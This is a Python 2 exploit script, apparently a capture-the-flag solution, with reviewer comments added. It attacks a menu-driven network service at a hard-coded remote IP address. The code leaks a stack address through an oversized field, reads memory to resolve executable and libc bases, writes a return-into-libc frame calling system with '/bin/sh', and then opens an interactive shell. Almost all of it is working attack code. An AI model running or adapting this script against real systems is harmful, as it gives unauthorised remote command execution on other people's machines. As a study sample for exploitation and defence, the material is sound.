# Python 2 script (print statement, backtick repr) that drives a menu-based
# remote service over a socket.  Remote, pack and unpack all come from the
# star-import of `codez`; pack/unpack are presumably struct.pack/struct.unpack
# re-exports, since the format strings 'I' / 'III' match struct -- TODO confirm.
#
# The service's protocol is visible only through the prompts the script waits
# for: '>' (main menu), '?' (sub-option), ':' (field input), plus a 'DATA: '
# line that option 3 prints.  Every write/read pair below is order-dependent
# and nothing checks that a read actually returned the expected prompt; a
# protocol change or a timeout would surface as an IndexError in a split()
# rather than as a clear error.
#
# Defensive reading: the script depends on the service (a) echoing more bytes
# back than it stored, (b) accepting raw 4-byte words as a field value and
# reflecting them through option 3, and (c) letting a 12-byte field written
# via option 4/2 alter control flow before option 5.  Each is an inference
# from the code, not something the file proves; length/content validation of
# the option-4 fields would be the natural place to break all three.
from codez import *

# NOTE(review): the first connection is dead code -- it is immediately
# replaced by the second one, so the 'localhost' endpoint is never used and
# the remote endpoint is hard-coded in the script.
r = Remote('localhost',1234)
r = Remote('175.119.158.134',5559)

# Set-up phase: two records are created (option 2, fields 'a' and 'b'), with
# option 1 / sub-option 1 or 2 selected around them.  What the records
# represent is not visible from this file.
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('2\n')
r.read(':');r.write('a\n')
r.read(':');r.write('b\n')
r.read('>')
r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('2\n')
r.read(':');r.write('a\n')
r.read(':');r.write('b\n')
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')

# Option 4 / sub-option 1 stores a 20-byte 'A' buffer; option 3 then prints
# it back.  The script keeps the 4 bytes that follow the first 16 'A's in the
# echoed output and decodes them as a little-endian 32-bit value.
# NOTE(review): presumably the service keeps only 16 bytes, so those 4 bytes
# are adjacent memory (an information leak); the variable name says it is a
# stack address.  Both points are inferred from usage, not shown here.
r.write('4\n');r.read('?');r.write('1\n');
r.write('A'*20 + "\n")
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('3\n')
stackx=unpack('I',r.read('>').split('A'*16,1)[1][:4])[0]
print hex(stackx)

# Store the single word stackx+136 six times as the option 4/1 field, then
# select option 3.  The offset 136 is target-specific and cannot be checked
# from this file.  The '>' read that consumes option 3's output for this
# sequence happens further down, where `binary` is computed.
r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('4\n');r.read('?');r.write('1\n');
r.write(pack('I',stackx+136)*6 + "\n")
r.read('>')
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('3\n')

def read4(addr,xint=True):
    """Return the bytes the service prints on its 'DATA: ' line for `addr`.

    Repeats the option 4/1 -> option 3 menu sequence used above, with `addr`
    packed six times as the stored field, then parses the response.

    addr: 32-bit value packed with 'I'; the callers treat it as an address.
    xint: True  -> the first 4 bytes after 'DATA: ', NUL-padded to exactly
                   4 so that unpack('I', ...) on the result cannot fail;
          False -> the whole first line after 'DATA: ', unpadded.
    Raises IndexError if 'DATA: ' is absent from the response (split()[1]).

    NOTE(review): the name and the callers use this as a read of memory at
    `addr`; that is inferred from usage, the protocol itself is not visible.
    """
    r.write('1\n');r.read('?');r.write('2\n');r.read('>')
    r.write('4\n');r.read('?');r.write('1\n');
    r.write(pack('I',addr)*6 + "\n")
    r.read('>')
    r.write('1\n');r.read('?');r.write('1\n');r.read('>')
    r.write('3\n')
    x=r.read('>')
    if xint:
        # Pad so a short line still unpacks as one 'I'.
        return x.split('DATA: ',1)[1].split("\n")[0][:4].ljust(4,"\x00")
    else:
        # print `x`
        return x.split('DATA: ',1)[1].split("\n")[0]

# Unused helper kept from development: would concatenate read4() results to
# cover `size` bytes (reads whole 4-byte words, so sizes that are not a
# multiple of 4 and >= 4 would be truncated).
# def xread(addr,size):
#     ret =[]
#     if size < 4:
#         return read4(addr)[:size]
#     for i in range(size>>2):
#         ret.append(read4(addr+i*4))
#     return ''.join(ret)

# Consume option 3's output from the stackx+136 sequence above: the first
# 4 bytes after 'DATA: ', minus 0xa10, are taken as the executable's base.
# 0xa10, 0xce9, 884400, 1427675 and 240880 are layout offsets of the target
# build (binary / libc); none of them can be verified from this file.
binary = unpack('I',r.read('>').split('DATA: ',1)[1][:4])[0] -0xa10
print hex(binary)

# read4(a) is combined as value + a + 4, which has the shape of resolving a
# 32-bit relative displacement; the result minus 884400 is then used as the
# base from which `binsh` and `system` are derived (names per the author).
a=binary+0xce9
addr=unpack('I',read4(a))[0]+a+4 -884400
binsh = 1427675 + addr
system = addr + 240880

# Store stackx+0x38 six times via option 4/1, same shape as the earlier
# stackx+136 write; no option-3 readback follows this time.
r.write('1\n');r.read('?');r.write('2\n');r.read('>')
r.write('4\n');r.read('?');r.write('1\n');
r.write(pack('I',stackx+0x38)*6 + "\n")
r.read('>')
#raw_input('x')

# Debug code kept from development (disabled): a downward search for an
# "ELF" header and a dump loop writing read4() output to /tmp/xbin1.
# NOTE(review): the dump loop reads and increments a name `read` that is
# never defined anywhere in this file, so it would NameError if re-enabled.
# print hex(addr)
# while not read4(addr,xint=False).startswith("ELF"):
#     if "\x00" in pack('I',addr):
#         addr -= 0x1000
#     addr -= 0x1000
#     print hex(addr)

# fd=open('/tmp/xbin1','w')
# while True:
#     x=read4(read,xint=False)
#     if not x:
#         x = "\x00"
#     print `x`
#     fd.write(x)
#     fd.flush()
#     read+=len(x)

# a=binary+0xd9f
# print hex(unpack('I',read4(a))[0]+a+4)

# Final option 4 / sub-option 2 field: three 32-bit words -- `system`, the
# marker value 0x41424344, and `binsh` -- followed by option 5, after which
# the socket is handed to the user interactively.
# NOTE(review): the triple has the layout of a return-into-libc frame
# (callee, saved return, one argument); inferred from the variable names.
r.write('1\n');r.read('?');r.write('1\n');r.read('>')
r.write('4\n');r.read('?');r.write('2\n');
r.write(pack('III',system,0x41424344,binsh)+"\n")
r.read('>')
r.write('5\n')
r.interactive()